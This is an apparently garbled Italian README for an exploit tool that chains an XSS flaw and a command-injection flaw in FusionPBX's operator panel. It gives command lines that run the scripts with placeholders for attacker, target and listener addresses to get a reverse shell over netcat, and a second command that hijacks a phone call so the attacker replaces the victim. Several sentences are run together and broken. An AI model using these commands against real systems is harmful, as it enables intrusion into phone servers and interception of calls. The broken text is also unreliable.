
Concatenazione di CVE-2019-11408 – XSS nel pannello operatore e CVE-2019-11409 – Iniezione di comandi nel pannello operatore.
Questo semplice codice tenta di completare l'implementazione della vulnerabilità concatenata introdotta da Dustin Cobb in RCE utilizzando Caller ID – Multiple vulnerabilità in FusionPBX.
netcat su un sistema remoto (rce_listener_address).x`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat e fornirà una reverse shellConoscendo Call-ID, from-tag e to-tag di una chiamata, eseguire il codice sottostante ti sostituirà alla vittima nella chiamata.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}